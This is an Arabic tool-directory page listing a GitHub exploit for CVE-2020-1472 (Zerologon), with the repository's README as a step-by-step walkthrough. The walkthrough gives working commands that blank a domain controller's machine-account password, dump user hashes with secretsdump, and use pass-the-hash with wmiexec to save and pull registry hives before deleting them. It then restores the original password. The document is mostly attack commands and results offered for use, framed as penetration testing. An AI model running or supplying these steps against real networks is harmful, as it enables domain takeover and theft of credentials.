Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2020-1472 — استغلال لـ CVE-2020-1472 (Zerologon) يعيد تعيين كلمة مرور حساب الآلة لوحدة التحكم بالمجال، مما يتيح تفريغ بيانات الاعتماد ورفع الامتيازات إلى مسؤول المجال. | Kitploit
أدوات/GitHubGitHub/shanfenglan/cve-2020-1472
تصعيد الامتيازاتهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاختبار الاختراق
GitHubshanfenglan/cve-2020-1472

cve-2020-1472

استغلال لـ CVE-2020-1472 (Zerologon) يعيد تعيين كلمة مرور حساب الآلة لوحدة التحكم بالمجال، مما يتيح تفريغ بيانات الاعتماد ورفع الامتيازات إلى مسؤول المجال.

عرض المستودع
24منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

cve-2020-1472

@toc

مبدأ الثغرة

المبدأ معقد نوعًا ما، لمن يهمه الأمر يمكنه الاطلاع على المقال في الرابط أدناه https://www.freebuf.com/articles/system/249860.html

الاستغلال

1. تعديل ملف impacket.dcerpc.v5.nrpc

يلزم استخدام ملف https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py لاستبدال ملف nrpc المحلي. مسار تخزين ملف nrpc المحلي هو: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py

2. إفراغ كلمة مرور حساب الجهاز yukong$

python cve-2020-1472-exploit.py اسم_حساب_الجهاز ip هنا وصف الصورة ويلاحظ أنه تم إفراغ كلمة مرور حساب الجهاز، وتمثل 31dc... كلمة مرور فارغة. هنا وصف الصورة

طرق الحصول على حساب الجهاز المقابل أو اسم netbios:

  1. net view اسم الخادم هذا مع $ هو اسم الجهاز، مثل lisi$ أو yukong$.
  1. nbtstat -A ip هنا وصف الصورة هناك طرق عديدة لتحديد ip وحدة تحكم المجال، مثل:
  2. عرض المضيفين الذين فتحوا المنفذ 53
  3. net time يعيد اسم مضيف وحدة تحكم المجال، ثم ping
  4. أمر systeminfo يعرض قيمة مجال وحدة التحكم، ping للحصول على ip وحدة التحكم
  5. الاطلاع على dns الخاص بالمضيف الحالي

3. قراءة كلمة مرور المسؤول

python secretsdump.py test.com/[email protected] -no-pass هنا وصف الصورة ويلاحظ أنه يمكن الآن استخدام حساب الجهاز بكلمة مرور فارغة لقراءة تجزئات المستخدمين على وحدة تحكم المجال.

4. تنزيل ملف sam الخاص بالهدف للتحضير لاستعادة كلمة مرور الجهاز

python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected] reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save

get system.save get sam.save get security.save

del /f system.save del /f sam.save del /f security.save

exit

هنا وصف الصورة بعد التنفيذ، يمكن العثور على الملفات التي تم تنزيلها في المجلد حيث يوجد البرنامج النصي wmiexec: هنا وصف الصورة

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss فشل تنفيذ هذا الأمر

5. فك تشفير ملف sam لمعرفة كلمة مرور الجهاز السابقة

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL هنا وصف الصورة احفظ كلمة المرور في الدائرة الحمراء، هذه هي كلمة مرور الجهاز السابقة، وهي aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.

6. إعادة تعيين كلمة مرور الجهاز yukong$

python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a هنا وصف الصورة

7. التحقق من نجاح استعادة كلمة المرور

python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$ python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$ هنا وصف الصورة يلاحظ نجاح الاستعادة.

تنزيل الأداة